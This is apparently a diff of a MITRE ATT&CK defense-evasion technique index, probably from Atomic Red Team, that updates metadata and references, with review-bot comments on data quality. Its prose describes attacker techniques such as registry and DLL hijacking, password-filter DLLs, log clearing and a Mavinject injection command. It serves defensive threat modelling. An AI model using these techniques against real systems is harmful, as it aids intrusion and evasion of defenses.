- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1542.001:
technique:
@@ -1532,12 +1610,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1542.001
atomic_tests: []
T1574.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T19:42:48.016Z'
name: 'Hijack Execution Flow: Services Registry Permissions Weakness'
description: |-
Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts. Windows stores local service configuration information in the Registry under HKLM\SYSTEM\CurrentControlSet\Services
. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through access control lists and user permissions. (Citation: Registry Key Security)(Citation: malware_hides_service)
@@ -1556,7 +1633,6 @@ defense-evasion:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- x_mitre_attack_spec_version: 2.1.0
x_mitre_contributors:
- Travis Smith, Tripwire
- Matthew Demaske, Adaptforward
@@ -1570,7 +1646,6 @@ defense-evasion:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -1597,8 +1672,8 @@ defense-evasion:
external_id: T1574.011
- source_name: Tweet Registry Perms Weakness
description: "@r0wdy_. (2017, November 30). Service Recovery Parameters. Retrieved
- April 9, 2018."
- url: https://twitter.com/r0wdy_/status/936365549553991680
+ September 12, 2024."
+ url: https://x.com/r0wdy_/status/936365549553991680
- source_name: insecure_reg_perms
description: Clément Labro. (2020, November 12). Windows RpcEptMapper Service
Insecure Registry Permissions EoP. Retrieved August 25, 2021.
@@ -1629,7 +1704,8 @@ defense-evasion:
url: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_zegost
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1574.011
atomic_tests: []
T1542.003:
@@ -1686,7 +1762,6 @@ defense-evasion:
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
atomic_tests: []
T1218.013:
technique:
@@ -1739,7 +1814,7 @@ defense-evasion:
PID /HMODULE=BASE_ADDRESS PATH_DLL ORDINAL_NUMBER). This command would
inject an import table entry consisting of the specified DLL into the module
at the given base address.(Citation: Mavinject Functionality Deconstructed)"
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T17:35:08.315Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Mavinject
x_mitre_detection: |-
@@ -1755,11 +1830,10 @@ defense-evasion:
- 'Process: Process Creation'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.005:
technique:
- modified: '2023-09-14T21:12:48.409Z'
+ modified: '2024-09-12T19:30:45.064Z'
name: 'Masquerading: Match Legitimate Name or Location'
description: |-
Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous.
@@ -1805,8 +1879,8 @@ defense-evasion:
external_id: T1036.005
- source_name: Twitter ItsReallyNick Masquerading Update
description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
- Retrieved April 22, 2019.
- url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+ Retrieved September 12, 2024.
+ url: https://x.com/ItsReallyNick/status/1055321652777619457
- source_name: Docker Images
description: Docker. (n.d.). Docker Images. Retrieved April 6, 2021.
url: https://docs.docker.com/engine/reference/commandline/images/
@@ -1816,9 +1890,8 @@ defense-evasion:
url: https://www.elastic.co/blog/how-hunt-masquerade-ball
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1036.005
atomic_tests: []
T1600:
@@ -1845,7 +1918,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T22:37:49.258Z'
name: Weaken Encryption
description: |-
Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)
@@ -1869,8 +1942,6 @@ defense-evasion:
x_mitre_permissions_required:
- Administrator
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1036.008:
technique:
@@ -1934,11 +2005,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1564:
technique:
- modified: '2024-03-29T17:45:48.126Z'
+ modified: '2024-10-15T15:58:49.815Z'
name: Hide Artifacts
description: |-
Adversaries may attempt to hide artifacts associated with their behaviors to evade detection. Operating systems may have features to hide various artifacts, such as important system files and administrative task execution, to avoid disrupting user work environments and prevent users from changing files or features on the system. Adversaries may abuse these features to hide artifacts such as files, directories, user accounts, or other system activity to evade detection.(Citation: Sofacy Komplex Trojan)(Citation: Cybereason OSX Pirrit)(Citation: MalwareBytes ADS July 2015)
@@ -1959,8 +2029,8 @@ defense-evasion:
- Linux
- macOS
- Windows
- - Office 365
- x_mitre_version: '1.2'
+ - Office Suite
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Metadata'
- 'Application Log: Application Log Content'
@@ -2004,12 +2074,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564
atomic_tests: []
T1484.002:
technique:
- modified: '2024-04-19T04:27:51.388Z'
+ modified: '2024-09-25T13:50:11.593Z'
name: Domain Trust Modification
description: "Adversaries may add new domain trusts, modify the properties of
existing domain trusts, or otherwise change the configuration of trust relationships
@@ -2029,9 +2098,14 @@ defense-evasion:
trust modifications such as altering the claim issuance rules to log in any
valid set of credentials as a specified user.(Citation: AADInternals zure
AD Federated Domain) \n\nAn adversary may also add a new federated identity
- provider to an identity tenant such as Okta, which may enable the adversary
- to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation
- 2023)"
+ provider to an identity tenant such as Okta or AWS IAM Identity Center, which
+ may enable the adversary to authenticate as any user of the tenant.(Citation:
+ Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to
+ gain broad access into a variety of cloud-based services that leverage the
+ identity tenant. For example, in AWS environments, an adversary that creates
+ a new identity provider for an AWS Organization will be able to federate into
+ all of the AWS Organization member accounts without creating identities for
+ each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
@@ -2051,9 +2125,8 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '2.0'
+ - Identity Provider
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
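Review bot: T1484.002's platforms collapse `Azure AD` and `SaaS` into `Identity Provider`, but the technique's atomic test is still titled `Add Federation to Azure AD`; if that test's platform metadata uses the old platform names it will no longer match the technique, so regenerate it with the same vocabulary or confirm the mismatch is acceptable.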
@@ -2070,6 +2143,10 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1484/002
external_id: T1484.002
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
- source_name: CISA SolarWinds Cloud Detection
description: CISA. (2021, January 8). Detecting Post-Compromise Threat Activity
in Microsoft Cloud Environments. Retrieved January 8, 2021.
@@ -2103,7 +2180,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1484.002
atomic_tests:
- name: Add Federation to Azure AD
@@ -2249,7 +2325,7 @@ defense-evasion:
url: https://docs.microsoft.com/windows-server/administration/windows-commands/bootcfg
description: Gerend, J. et al. (2017, October 16). bootcfg. Retrieved August
30, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-31T14:51:47.352Z'
name: 'Impair Defenses: Safe Boot Mode'
description: |-
Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot.(Citation: Microsoft Safe Mode)(Citation: Sophos Snatch Ransomware 2019)
@@ -2277,8 +2353,6 @@ defense-evasion:
- Anti-virus
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1562.009
atomic_tests: []
T1542.005:
@@ -2321,7 +2395,7 @@ defense-evasion:
url: https://tools.cisco.com/security/center/resources/integrity_assurance.html#26
description: Cisco. (n.d.). Cisco IOS Software Integrity Assurance - Boot
Information. Retrieved October 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-22T16:35:53.806Z'
name: TFTP Boot
description: |-
Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.
@@ -2345,12 +2419,10 @@ defense-evasion:
- 'Firmware: Firmware Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1497.001:
technique:
- modified: '2024-04-19T12:49:40.919Z'
+ modified: '2024-09-12T15:50:18.047Z'
name: 'Virtualization/Sandbox Evasion: System Checks'
description: "Adversaries may employ various system checks to detect and avoid
virtualization and analysis environments. This may include changing behaviors
@@ -2440,13 +2512,12 @@ defense-evasion:
url: https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/stopping-malware-fake-virtual-machine/
- source_name: Deloitte Environment Awareness
description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1497.001
atomic_tests: []
T1070.002:
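Review bot: the `Deloitte Environment Awareness` URL gains an `/edit` suffix on a `drive.google.com/file/d/...` link; `/edit` is the editing view and can require sign-in or explicit permission to open, whereas the previous bare link served as a shareable view. Verify the new form resolves for an unauthenticated reader before shipping the updated retrieval date.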
@@ -2470,7 +2541,7 @@ defense-evasion:
url: https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/
description: Marcel. (2018, April 19). 12 Critical Linux Log Files You Must
be Monitoring. Retrieved March 29, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-29T21:23:51.886Z'
name: 'Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs'
description: |
Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the /var/log/
directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)
@@ -2495,8 +2566,6 @@ defense-evasion:
- 'File: File Deletion'
- 'File: File Modification'
- 'Command: Command Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1070.002
atomic_tests: []
T1218.004:
@@ -2525,7 +2594,7 @@ defense-evasion:
- source_name: LOLBAS Installutil
url: https://lolbas-project.github.io/lolbas/Binaries/Installutil/
description: LOLBAS. (n.d.). Installutil.exe. Retrieved July 31, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-11T18:47:52.603Z'
name: 'Signed Binary Proxy Execution: InstallUtil'
description: |-
Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) The InstallUtil binary may also be digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v\InstallUtil.exe
and C:\Windows\Microsoft.NET\Framework64\v\InstallUtil.exe
.
@@ -2551,8 +2620,6 @@ defense-evasion:
- Application control
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1218.004
atomic_tests: []
T1027.008:
@@ -2604,18 +2671,17 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1574.001:
technique:
- modified: '2024-04-18T22:54:54.668Z'
+ modified: '2024-09-30T17:32:59.948Z'
name: 'Hijack Execution Flow: DLL Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
- Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+ Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
@@ -2631,8 +2697,8 @@ defense-evasion:
- Travis Smith, Tripwire
- Stefan Kanthak
- Marina Liang
- - Will Alexander
- - Ami Holeston
+ - Ami Holeston, CrowdStrike
+ - Will Alexander, CrowdStrike
x_mitre_deprecated: false
x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -2646,7 +2712,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -2672,6 +2738,10 @@ defense-evasion:
description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
17, 2020.
url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+ - source_name: Hexacorn DLL Hijacking
+ description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+ Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
- source_name: Microsoft Security Advisory 2269637
description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
March 13, 2020.
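Review bot: the new `Hexacorn DLL Hijacking` reference is well formed, but the `Microsoft Security Advisory 2269637` entry right below it still carries an empty year in `(, May 23)`; since the reference list is being regenerated here, this is the moment to fill the year from the source or flag it rather than re-emit the malformed citation.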
@@ -2699,12 +2769,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1574.001
atomic_tests: []
T1553.001:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-21T19:30:58.414Z'
name: 'Subvert Trust Controls: Gatekeeper Bypass'
description: |-
Adversaries may modify file attributes and subvert Gatekeeper functionality to evade user prompts and execute untrusted programs. Gatekeeper is a set of technologies that act as layer of Apple’s security model to ensure only trusted applications are executed on a host. Gatekeeper was built on top of File Quarantine in Snow Leopard (10.6, 2009) and has grown to include Code Signing, security policy compliance, Notarization, and more. Gatekeeper also treats applications running for the first time differently than reopened applications.(Citation: TheEclecticLightCompany Quarantine and the flag)(Citation: TheEclecticLightCompany apple notarization )
@@ -2800,7 +2869,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1553.001
atomic_tests: []
T1553.002:
@@ -2867,7 +2935,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1036.009:
technique:
@@ -2932,11 +2999,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1222.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:27:04.900Z'
name: 'File and Directory Permissions Modification: Windows File and Directory
Permissions Modification'
description: |-
@@ -2997,12 +3063,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1222.001
atomic_tests: []
T1574.014:
technique:
- modified: '2024-04-18T15:03:32.158Z'
+ modified: '2024-04-28T15:44:25.342Z'
name: AppDomainManager
description: "Adversaries may execute their own malicious payloads by hijacking
how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
@@ -3028,7 +3093,7 @@ defense-evasion:
phase_name: defense-evasion
x_mitre_contributors:
- Thomas B
- - Ivy Bostock
+ - Ivy Drexel
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -3070,7 +3135,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.007:
technique:
@@ -3112,7 +3176,7 @@ defense-evasion:
Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi).(Citation: Microsoft msiexec) The Msiexec.exe binary may also be digitally signed by Microsoft.
Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro Msiexec Feb 2018) Since it may be signed and native on Windows systems, msiexec.exe can be used to bypass application control solutions that do not account for its potential abuse. Msiexec.exe execution may also be elevated to SYSTEM privileges if the AlwaysInstallElevated
policy is enabled.(Citation: Microsoft AlwaysInstallElevated 2018)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T17:33:16.346Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Signed Binary Proxy Execution: Msiexec'
x_mitre_detection: Use process monitoring to monitor the execution and arguments
@@ -3135,36 +3199,11 @@ defense-evasion:
- Application control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.007
atomic_tests: []
T1556.002:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
- type: attack-pattern
- created: '2020-02-11T19:05:45.829Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.002
- url: https://attack.mitre.org/techniques/T1556/002
- - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
- description: Fuller, R. (2013, September 11). Stealing passwords every time
- they change. Retrieved November 21, 2017.
- source_name: Carnal Ownage Password Filters Sept 2013
- - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
- description: Bialek, J. (2013, September 15). Intercepting Password Changes
- With Function Hooking. Retrieved November 21, 2017.
- source_name: Clymb3r Function Hook Passwords Sept 2013
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T16:16:18.271Z'
name: 'Modify Authentication Process: Password Filter DLL'
description: "Adversaries may register malicious password filter dynamic link
libraries (DLLs) into the authentication process to acquire user credentials
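Review bot: for T1556.002 almost everything deleted in this hunk (x_mitre_platforms, x_mitre_domains, x_mitre_contributors, object_marking_refs, id, type, created, created_by_ref and the whole external_references list) is re-emitted lower in the object by the next hunk with the same values; the only substantive change visible here is `modified`. If the generator dumps objects in whatever key order the source bundle happens to use, consider serializing with a fixed key order so future diffs show the real changes (version bump, dropped permissions_required) instead of a 40-line churn per object.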
@@ -3188,22 +3227,44 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Creation'
- 'Module: Module Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+ created: '2020-02-11T19:05:45.829Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/002
+ external_id: T1556.002
+ - source_name: Clymb3r Function Hook Passwords Sept 2013
+ description: Bialek, J. (2013, September 15). Intercepting Password Changes
+ With Function Hooking. Retrieved November 21, 2017.
+ url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+ - source_name: Carnal Ownage Password Filters Sept 2013
+ description: Fuller, R. (2013, September 11). Stealing passwords every time
+ they change. Retrieved November 21, 2017.
+ url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.002
atomic_tests: []
T1070.007:
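Review bot: `x_mitre_permissions_required` (Administrator, SYSTEM) is dropped from T1556.002 with no replacement field, while `x_mitre_deprecated: false` and `revoked: false` are added. Anything downstream that reads permissions_required (index CSV generation, filters) must now tolerate the key being absent; the same removal happens for T1600.001, T1055.003 and T1070.006 in this patch. The two non-ATT&CK references also swap order (Clymb3r now before Carnal Ownage) with unchanged descriptions, which is harmless but confirms this is a regeneration rather than a hand edit.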
@@ -3278,7 +3339,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1600.001:
technique:
@@ -3304,7 +3364,7 @@ defense-evasion:
url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
description: Omar Santos. (2020, October 19). Attackers Continue to Target
Legacy Devices. Retrieved October 20, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-10-21T22:36:22.369Z'
name: Reduce Key Space
description: |-
Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.(Citation: Cisco Synful Knock Evolution)
@@ -3327,8 +3387,6 @@ defense-evasion:
- 'File: File Modification'
x_mitre_permissions_required:
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1070.003:
technique:
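Review bot: T1600.001 loses both `spec_version` and `x_mitre_attack_spec_version: 2.1.0` with nothing taking their place, and T1055.003 below is treated the same way, whereas T1218.007 and T1205 keep `x_mitre_attack_spec_version: 2.1.0` and the objects that were genuinely refreshed carry 3.2.0. An object with no attack spec version at all is what a STIX 2.0 style export looks like, and these are also the objects whose `modified` went backwards, so a subset of objects appears to come from a different bundle than the rest. Worth confirming the source rather than merging a mixed snapshot.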
@@ -3424,65 +3482,75 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1070.003
atomic_tests: []
T1202:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-03T14:47:17.154Z'
+ name: Indirect Command Execution
+ description: |-
+ Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters. Various Windows utilities may be used to execute commands, possibly without invoking [cmd](https://attack.mitre.org/software/S0106). For example, [Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant (pcalua.exe), components of the Windows Subsystem for Linux (WSL), Scriptrunner.exe, as well as other utilities may invoke the execution of programs and commands from a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts.(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)(Citation: Secure Team - Scriptrunner.exe)(Citation: SS64)(Citation: Bleeping Computer - Scriptrunner.exe)
+
